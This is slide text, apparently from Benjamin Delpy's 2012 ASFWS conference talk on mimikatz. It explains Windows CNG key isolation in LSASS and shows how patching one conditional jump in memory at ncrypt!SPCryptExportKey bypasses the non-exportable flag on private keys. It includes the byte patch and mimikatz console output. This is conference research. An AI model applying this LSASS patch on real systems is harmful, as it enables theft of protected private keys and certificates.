mimikatz :: crypto :: cnghow it works • “Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior.” • http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx • “To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default. • This time, keys operations are not made in the “user” process context • Process use RPC to call “Key isolation service” (keyiso) functions • It seems more secure than CryptoAPI… • It is, but it’s not perfect… Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: crypto :: cnghow it’s exported ( level) PLAYSKOOL NT6 System protectedprocessML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP KeyIso Service (LSASS Process) CNG LoadPrivate Key DPAPI Decode Exportable ? yes no RPC Process Ask to export Key NTE_NOT_SUPPORTED Exported Key Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: crypto :: patchcngbecause sometimes I own LSASS • When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass(keyiso):ncrypt!SPCryptExportKey • This function do all the work to prepare the export, and check if the key is exportable Exportable ? mimikatz # crypto::exportKeys [user] Clés CNG : - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabilité : NON Tailleclé : 2048 Export privédans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : (0x80090029) L'opérationdemandéen'est pas prise en charge. Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: crypto :: patchcngbecause sometimes I own LSASS • This time, checks and keys are in LSASS process…And what ? • I wrote “1” byte in LSASSmemory space… .text:6C815210 751Cjnzshort continue_key_export .text:6C815210 EB 1C jmp short continue_key_export Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: crypto :: patchcngdemo time ! • Import, export, import as not exportable…. export again Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com